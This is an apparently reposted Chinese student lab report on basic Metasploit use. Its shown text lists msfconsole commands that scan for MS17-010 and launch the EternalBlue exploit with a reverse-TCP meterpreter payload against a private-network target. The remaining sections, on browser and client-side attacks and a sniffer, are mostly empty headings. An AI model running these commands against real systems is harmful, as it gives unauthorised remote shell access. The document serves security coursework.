其他分享
首页 > 其他分享> > 20182217刘洪宇_Exp6 MSF应用基础

20182217刘洪宇_Exp6 MSF应用基础

作者:互联网

1. 实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.1一个主动攻击实践,ms17_010; (1分)

 

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.43.82(靶机IP)
exploit

 

  

 

 

 

  use exploit/windows/smb/ms17_010_eternalblue(选择该漏洞)
  set payload windows/x64/meterpreter/reverse_tcp(设置攻击的载荷)
  set rhosts 192.168.43.82(靶机IP)
  set lhosts 192.168.43.96(kaliIP)
  exploit

  

 

 

 

 

 

 

 

 

1.2 一个针对浏览器的攻击,ms11_003;

  

 

 

  

 

 

 

 

 

 

sessions
sessions 1

 

 

  

 

 

  

 

 

 

 

1.3 一个针对客户端的攻击,如Adobe或office

  

 

 

 

 

 

 

  

 

 

  

 

 

 

  

 

 

 

  

 

 

 

1.4 成功应用任何一个辅助模块,嗅探sniffer。

  

 

 

2.问题回答

2.1.基础问题回答 

(1)用自己的话解释什么是exploit,payload,encode.

2.2.实践总结与体会

2.3.离实战还缺些什么技术或步骤?

标签:刘洪宇,set,windows,use,Exp6,exploit,MSF,靶机,payload
来源: https://www.cnblogs.com/bocaiyu/p/14741299.html